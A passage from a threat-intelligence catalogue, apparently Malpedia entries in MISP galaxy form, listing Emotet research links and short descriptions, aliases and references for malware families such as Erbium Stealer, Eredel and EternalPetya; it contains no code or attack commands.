
https://www.fortinet.com/blog/threat-research/ms-office-files-involved-again-in-recent-emotet-trojan-campaign-part-ii

https://twitter.com/eduardfir/status/1461856030292422659

https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack

https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/

https://www.youtube.com/watch?v=_BLOmClsSpc

https://www.proofpoint.com/us/blog/threat-insight/emotet-tests-new-delivery-techniques

https://forensicitguy.github.io/emotet-excel4-macro-analysis/

https://www.bleepingcomputer.com/news/security/emotet-malware-is-back-and-rebuilding-its-botnet-via-trickbot/

https://isc.sans.edu/diary/28044

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html

https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf

https://blogs.jpcert.or.jp/en/2021/02/emotet-notice.html

https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken--the-resurgence-of-the-emotet-botnet-malw.html

https://community.riskiq.com/article/2cd1c003

https://cocomelonc.github.io/persistence/2023/12/10/malware-pers-23.html

https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/

https://www.deepinstinct.com/blog/the-re-emergence-of-emotet

https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html

https://www.proofpoint.com/us/blog/threat-insight/emotet-makes-timely-adoption-political-and-elections-lures

https://adalogics.com/blog/the-state-of-advanced-code-injections

https://www.welivesecurity.com/2022/06/16/how-emotet-is-changing-tactics-microsoft-tightening-office-macro-security/

https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled

https://www.vmware.com/content/dam/learn/en/amer/fy23/pdf/1669005_Emotet_Exposed_A_Look_Inside_the_Cybercriminal_Supply_Chain.pdf

https://blog.talosintelligence.com/emotet-switches-to-onenote/

https://www.hornetsecurity.com/en/security-information/emotet-is-back/

https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf

https://blog.vincss.net/2021/01/re019-from-a-to-x-analyzing-some-real-cases-which-used-recent-Emotet-samples.html

https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/

https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf

https://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html

https://www.fortinet.com/blog/threat-research/Trends-in-the-recent-emotet-maldoc-outbreak

https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/

https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2

https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/

https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-003.pdf

https://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html

https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf

https://krebsonsecurity.com/2021/01/international-action-targets-emotet-crimeware

https://www.youtube.com/watch?v=_mGMJFNJWSk

https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf

https://blog.virustotal.com/2020/11/using-similarity-to-expand-context-and.html

https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/

https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/

https://securelist.com/the-chronicles-of-emotet/99660/

https://cyber.wtf/2022/03/23/what-the-packer/

https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/

https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-two-596128

https://www.lac.co.jp/lacwatch/people/20201106_002321.html

https://paste.cryptolaemus.com

https://www.cert.pl/en/news/single/analysis-of-emotet-v4/

https://www.cert.pl/en/news/single/whats-up-emotet/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion

https://news.sophos.com/en-us/2022/05/04/attacking-emotets-control-flow-flattening/

https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return

https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.deepinstinct.com/2020/08/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before/

https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf

https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/

https://cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/

https://www.cert.ssi.gouv.fr/alerte/CERTFR-2020-ALE-019/

https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html

https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/

https://spamauditor.org/2020/10/the-many-faces-of-emotet/

https://blogs.vmware.com/security/2022/05/emotet-config-redux.html

https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/

https://www.lac.co.jp/lacwatch/alert/20211119_002801.html

https://www.hornetsecurity.com/en/security-informationen-en/webshells-powering-emotet/

https://security-soup.net/quick-post-spooky-new-powershell-obfuscation-in-emotet-maldocs/

https://www.youtube.com/watch?v=5_-oR_135ss

https://unit42.paloaltonetworks.com/c2-traffic/

https://www.zscaler.com/blogs/security-research/return-emotet-malware-analysis

https://forensicitguy.github.io/shortcut-to-emotet-ttp-change/

https://persianov.net/emotet-malware-analysis-part-1

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service

https://www.youtube.com/watch?v=8PHCZdpNKrw

https://www.zscaler.com/blogs/research/emotet-back-action-after-short-break

https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-one-592612

https://kienmanowar.wordpress.com/2022/12/19/z2abimonthly-malware-challege-emotet-back-from-the-dead/

https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/

https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89

https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction

https://www.binarydefense.com/emotet-wi-fi-spreader-upgraded/

https://www.netskope.com/blog/emotet-new-delivery-mechanism-to-bypass-vba-protection

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/

https://hatching.io/blog/powershell-analysis

https://medium.com/@Ilandu/emotet-unpacking-35bbe2980cfb

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://securelist.com/emotet-modules-and-recent-attacks/106290/

https://www.cyren.com/blog/articles/example-analysis-of-multi-component-malware

https://de.darktrace.com/blog/emotet-resurgence-cross-industry-campaign-analysis

https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/

https://www.welivesecurity.com/2023/07/06/whats-up-with-emotet/

https://isc.sans.edu/forums/diary/Emotet+Stops+Using+0000+in+Spambot+Traffic/28270/

https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html

https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/

https://www.bleepingcomputer.com/news/security/united-nations-targeted-with-emotet-malware-phishing-attack/

https://pl-v.github.io/plv/posts/Emotet-unpacking/

https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor

https://www.trendmicro.com/en_no/research/23/c/emotet-returns-now-adopts-binary-padding-for-evasion.html

https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf

https://github.com/d00rt/emotet_research

https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/

https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/

https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.fortinet.com/blog/threat-research/bad-actors-capitalize-current-events-email-scams

https://www.infosecurity-magazine.com/blogs/a-rundown-of-the-emotet-malware/

https://blogs.vmware.com/networkvirtualization/2022/01/emotet-is-not-dead-yet.html/

https://www.dsih.fr/article/4483/emotet-de-retour-poc-exchange-0-day-windows-a-quelle-sauce-les-attaquants-prevoient-de-nous-manger-cette-semaine.html

https://unit42.paloaltonetworks.com/emotet-malware-summary-epoch-4-5/

https://marcoramilli.com/2019/10/14/is-emotet-gang-targeting-companies-with-external-soc/

https://infosecwriteups.com/unpacking-emotet-trojan-dac7e6119a0a

https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.cronup.com/la-botnet-de-emotet-reinicia-ataques-en-chile-y-latinoamerica/

https://www.us-cert.gov/ncas/alerts/TA18-201A

https://www.kroll.com/en/insights/publications/cyber/monitor/emotet-analysis-new-lnk-in-the-infection-chain

https://www.anomali.com/blog/mummy-spiders-emotet-malware-is-back-after-a-year-hiatus-wizard-spiders-trickbot-observed-in-its-return

https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmwcb-report-modern-bank-heists-2020.pdf

https://www.bleepingcomputer.com/news/security/emotet-malware-hits-lithuanias-national-public-health-center/

https://cdn.www.carbonblack.com/wp-content/uploads/2020/05/VMWCB-Report-Modern-Bank-Heists-2020.pdf

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/

https://www.bitsight.com/blog/emotet-smb-spreader-back

https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html

https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/

https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html

https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf

https://www.proofpoint.com/us/blog/threat-insight/geofenced-amazon-japan-credential-phishing-volumes-rival-emotet

https://www.cert.govt.nz/it-specialists/advisories/emotet-malware-being-spread-via-email/

https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles

https://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://notes.netbytesec.com/2021/02/deobfuscating-emotet-macro-and.html

https://www.hornetsecurity.com/en/security-information/awaiting-the-inevitable-return-of-emotet/

https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/

https://cert.grnet.gr/en/blog/reverse-engineering-emotet/

https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships

https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-emotets-use-of-cryptography/

https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them

https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://www.eurojust.europa.eu/worlds-most-dangerous-malware-emotet-disrupted-through-global-action

https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://www.trendmicro.com/en_us/research/22/a/emotet-spam-abuses-unconventional-ip-address-formats-spread-malware.html

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html

https://medium.com/brim-securitys-knowledge-funnel/hunting-emotet-with-brim-and-zeek-1000c2f5c1ff

https://www.advintel.io/post/corporate-loader-emotet-history-of-x-project-return-for-ransomware

https://blogs.jpcert.or.jp/en/2019/12/emotetfaq.html

https://blog.malwarebytes.com/trojans/2020/07/long-dreaded-emotet-has-returned/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf

https://feodotracker.abuse.ch/?filter=version_e

https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/

https://persianov.net/emotet-malware-analysis-part-2

https://www.esentire.com/security-advisories/emotet-activity-identified

https://medium.com/threat-intel/emotet-dangerous-malware-keeps-on-evolving-ac84aadbb8de

https://www.bleepingcomputer.com/news/security/emotet-malware-attacks-return-after-three-month-break/

https://www.digitalshadows.com/blog-and-research/how-cybercriminals-are-taking-advantage-of-covid-19-scams-fraud-misinformation/

https://www.tgsoft.it/files/report/download.asp?id=7481257469

https://blogs.vmware.com/security/2022/05/emotet-moves-to-64-bit-and-updates-its-loader.html

https://blog.talosintelligence.com/2020/11/emotet-2020.html

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://intel471.com/blog/conti-emotet-ransomware-conti-leaks

https://exchange.xforce.ibmcloud.com/collection/18f373debc38779065a26f1958dc260b

https://www.youtube.com/watch?v=q8of74upT_g

https://www.picussecurity.com/blog/emotet-technical-analysis-part-1-reveal-the-evil-code

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/

https://intezer.com/blog/research/how-hackers-use-binary-padding-to-outsmart-sandboxes/

https://www.deepinstinct.com/2020/10/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before-part-2/

https://intel471.com/blog/emotet-takedown-2021/

https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office

https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022

https://www.hornetsecurity.com/en/threat-research/emotet-botnet-takedown/

https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise

https://speakerdeck.com/fr0gger/x-ray-of-malware-evasion-techniques-analysis-dissection-cure

https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf

https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol

https://research.checkpoint.com/emotet-tricky-trojan-git-clones/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage

https://www.bitsight.com/blog/emotet-botnet-rises-again

https://github.com/mauronz/binja-emotet

https://asec.ahnlab.com/en/33600/

https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html

https://d00rt.github.io/emotet_network_protocol/

https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot

https://muha2xmad.github.io/unpacking/emotet-part-2/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf

https://www.wiwo.de/my/technologie/digitale-welt/emotet-netzwerk-wie-eines-der-groessten-hacker-netzwerke-der-welt-lahmgelegt-wurde/27164048.html

https://blog.lumen.com/emotet-redux/

https://www.youtube.com/watch?v=EyDiIAtdI

https://twitter.com/Cryptolaemus1/status/1516535343281025032

https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903

https://team-cymru.com/blog/2021/01/27/taking-down-emotet/

https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/

https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://news.sophos.com/en-us/2020/07/28/emotets-return-is-the-canary-in-the-coal-mine/?cmp=30728

https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html

https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/

https://hello.global.ntt/en-us/insights/blog/emotet-disruption-europol-counterattack

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/

https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-your-email-attachments-to-attack-contacts/

https://www.youtube.com/watch?v=AkZ5TYBqcU4

https://www.jpcert.or.jp/english/at/2019/at190044.html

https://www.politie.nl/nieuws/2021/februari/17/politie-bestrijdt-cybercrime-via-nederlandse-infrastructuur.html

https://blogs.cisco.com/security/emotet-is-back

https://www.netskope.com/blog/netskope-threat-coverage-the-return-of-emotet

http://ropgadget.com/posts/defensive_pcres.html

https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/

https://blog.nviso.eu/2022/03/23/hunting-emotet-campaigns-with-kusto/

https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2021/Presse2021/210127_pmEmotet.html

https://kienmanowar.wordpress.com/2022/01/23/quicknote-emotet-epoch4-epoch5-tactics/

https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers

https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/

https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html

https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5

https://www.secureworks.com/research/threat-profiles/gold-crestwood

https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes

https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much

https://blogs.vmware.com/networkvirtualization/2022/02/emotet-is-not-dead-yet-part-2.html/

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://web.archive.org/web/20211223100528/https://cloudsek.com/emotet-2-0-everything-you-need-to-know-about-the-new-variant-of-thbanking-trojan/

https://isc.sans.edu/diary/rss/28254

https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html

https://www.netskope.com/blog/emotet-still-abusing-microsoft-office-macros

https://unit42.paloaltonetworks.com/new-emotet-infection-method/

https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/

https://twitter.com/milkr3am/status/1354459859912192002

https://www.intrinsec.com/emotet-returns-and-deploys-loaders/

https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf

https://www.gdatasoftware.com/blog/2022/01/malware-vaccines

http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1

https://www.digitalshadows.com/blog-and-research/emotet-disruption/

https://blog.cyble.com/2022/04/27/emotet-returns-with-new-ttps-and-delivers-lnk-files-to-its-victims/

https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/

https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html

https://blog.trendmicro.com/trendlabs-security-intelligence/emotet-adds-new-evasion-technique-and-uses-connected-devices-as-proxy-cc-servers/

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf

https://unit42.paloaltonetworks.com/emotet-thread-hijacking/

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://twitter.com/ContiLeaks/status/1498614197202079745

https://muha2xmad.github.io/unpacking/emotet-part-1/

https://unit42.paloaltonetworks.com/attack-chain-overview-emotet-in-december-2020-and-january-2021/

https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns

https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx

https://cert-agid.gov.it/news/malware/semplificare-lanalisi-di-emotet-con-python-e-iced-x86/

https://www.ironnet.com/blog/detecting-a-mummyspider-campaign-and-emotet-infection

https://threatresearch.ext.hp.com/emotets-return-whats-different/

https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/

https://hello.global.ntt/en-us/insights/blog/shellbot-victim-overlap-with-emotet-network-infrastructure

https://atr-blog.gigamon.com/2020/01/13/emotet-not-your-run-of-the-mill-malware/

https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc

https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf

https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/

https://www.zscaler.com/blogs/security-research/return-emotet-malware

https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation

https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html

https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf

https://blog.threatlab.info/malware-analysis-emotet-infection/

https://quickheal.co.in/documents/technical-paper/Whitepaper_HowToPM.pdf

https://www.bleepingcomputer.com/news/security/emotet-botnet-switches-to-64-bit-modules-increases-activity/

Empire Downloader

The tag is: misp-galaxy:malpedia="Empire Downloader"

Empire Downloader is also known as:

Table 3426. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader

https://attack.mitre.org/groups/G0096

https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/looking-over-the-nation-state-actors-shoulders.html

https://www.secureworks.com/research/threat-profiles/gold-drake

https://twitter.com/thor_scanner/status/992036762515050496

https://lab52.io/blog/wirte-group-attacking-the-middle-east/

https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html

https://www.secureworks.com/research/threat-profiles/bronze-atlas

https://www.secureworks.com/research/threat-profiles/gold-ulrick

https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/

https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf

http://www.secureworks.com/research/threat-profiles/gold-burlap

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf

https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/

https://us-cert.cisa.gov/ncas/alerts/aa20-275a

https://redcanary.com/blog/getsystem-offsec/

https://www.cisa.gov/uscert/ncas/alerts/aa22-249a

https://paper.seebug.org/1301/

https://www.secureworks.com/research/threat-profiles/bronze-firestone

http://www.secureworks.com/research/threat-profiles/gold-heron

https://www.secureworks.com/research/threat-profiles/gold-heron

https://unit42.paloaltonetworks.com/atoms/obscureserpens/

https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.mandiant.com/media/12596/download

Emudbot

Supposedly a worm that was active around 2012-2013.

The tag is: misp-galaxy:malpedia="Emudbot"

Emudbot is also known as:

Table 3427. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.emudbot

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/worm_emudbot.jp

Enigma Loader

According to Trend Micro, this is a downloader dedicated to staging the execution of a second-stage malware called Enigma Stealer.

The tag is: misp-galaxy:malpedia="Enigma Loader"

Enigma Loader is also known as:

Table 3429. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.enigma_loader

https://www.trendmicro.com/en_us/research/23/b/enigma-stealer-targets-cryptocurrency-industry-with-fake-jobs.html

EntryShell

EntryShell is fileless malware considered a variant of the KeyBoy malware, due to similarities in backdoor command IDs and debug messages with old KeyBoy samples. The embedded malware config was encrypted with a unique algorithm.

The tag is: misp-galaxy:malpedia="EntryShell"

EntryShell is also known as:

Table 3431. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.entryshell

https://www.virusbulletin.com/conference/vb2023/abstracts/unveiling-activities-tropic-trooper-2023-deep-analysis-xiangoop-loader-and-entryshell-payload/

Epsilon Red

According to PCrisk, Epsilon is a ransomware-type program. This malware is designed to encrypt the data of infected systems in order to demand payment for decryption.

The tag is: misp-galaxy:malpedia="Epsilon Red"

Epsilon Red is also known as:

  • BlackCocaine

Table 3434. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.epsilon_red

https://news.sophos.com/en-us/2021/05/28/epsilonred/

https://cybleinc.com/2021/06/03/nucleus-software-becomes-victim-of-the-blackcocaine-ransomware/

https://therecord.media/epsilonred-ransomware-group-hits-one-of-indias-financial-software-powerhouses/

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

Erbium Stealer

Erbium is an information stealer advertised and sold as a Malware-as-a-Service on cybercrime forums and Telegram since at least July 2022. Its capabilities are those of a classic information stealer, with a focus on cryptocurrency wallets, and file grabber capabilities.

The tag is: misp-galaxy:malpedia="Erbium Stealer"

Erbium Stealer is also known as:

Table 3437. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.erbium_stealer

https://twitter.com/sekoia_io/status/1577222282929311744

https://twitter.com/abuse_ch/status/1565290110572175361

https://blog.cluster25.duskrise.com/2022/09/15/erbium-stealer-a-new-infostealer

https://www.bleepingcomputer.com/news/security/new-erbium-password-stealing-malware-spreads-as-game-cracks-cheats/

Eredel

Eredel Stealer is a low-priced malware that extracts passwords, cookies and desktop screenshots from browsers and programs.

According to nulled[.]to:

Supported browsers, Chromium based: Chromium, Google Chrome, Kometa, Amigo, Torch, Orbitum, Opera, Opera Neon, Comodo Dragon, Nichrome (Rambler), Yandex Browser, Maxthon5, Sputnik, Epic Privacy Browser, Vivaldi, CocCoc and other Chromium based browsers.

  • Stealing FileZilla

  • Stealing an account from Telegram

  • Stealing AutoFill

  • Theft of wallets: Bitcoin | Dash | Monero | Electrum | Ethereum | Litecoin

  • Stealing files from the desktop. Supports any formats, configurable via telegram-bot

The tag is: misp-galaxy:malpedia="Eredel"

Eredel is also known as:

Table 3439. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.eredel

https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:https://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab

Erica Ransomware

The tag is: misp-galaxy:malpedia="Erica Ransomware"

Erica Ransomware is also known as:

Table 3440. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.erica_ransomware

https://www.dropbox.com/s/f4uulu2rhyj4leb/Girl.scr_malware_report.pdf?dl=0

Eris

Ransomware.

The tag is: misp-galaxy:malpedia="Eris"

Eris is also known as:

Table 3441. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.eris

https://lekstu.ga/posts/go-under-the-hood-eris/

EternalRocks

The tag is: misp-galaxy:malpedia="EternalRocks"

EternalRocks is also known as:

  • MicroBotMassiveNet

Table 3443. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.eternalrocks

https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/

https://github.com/stamparm/EternalRocks

EternalPetya

According to Proofpoint, Bad Rabbit is a strain of ransomware that first appeared in 2017 and is a suspected variant of Petya. Like other strains of ransomware, Bad Rabbit infections lock up victims’ computers, servers, or files, preventing them from regaining access until a ransom (usually in Bitcoin) is paid.

The tag is: misp-galaxy:malpedia="EternalPetya"

EternalPetya is also known as:

  • BadRabbit

  • Diskcoder.C

  • ExPetr

  • NonPetya

  • NotPetya

  • Nyetya

  • Petna

  • Pnyetya

  • nPetya

Table 3444. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya

https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf

https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors

https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat

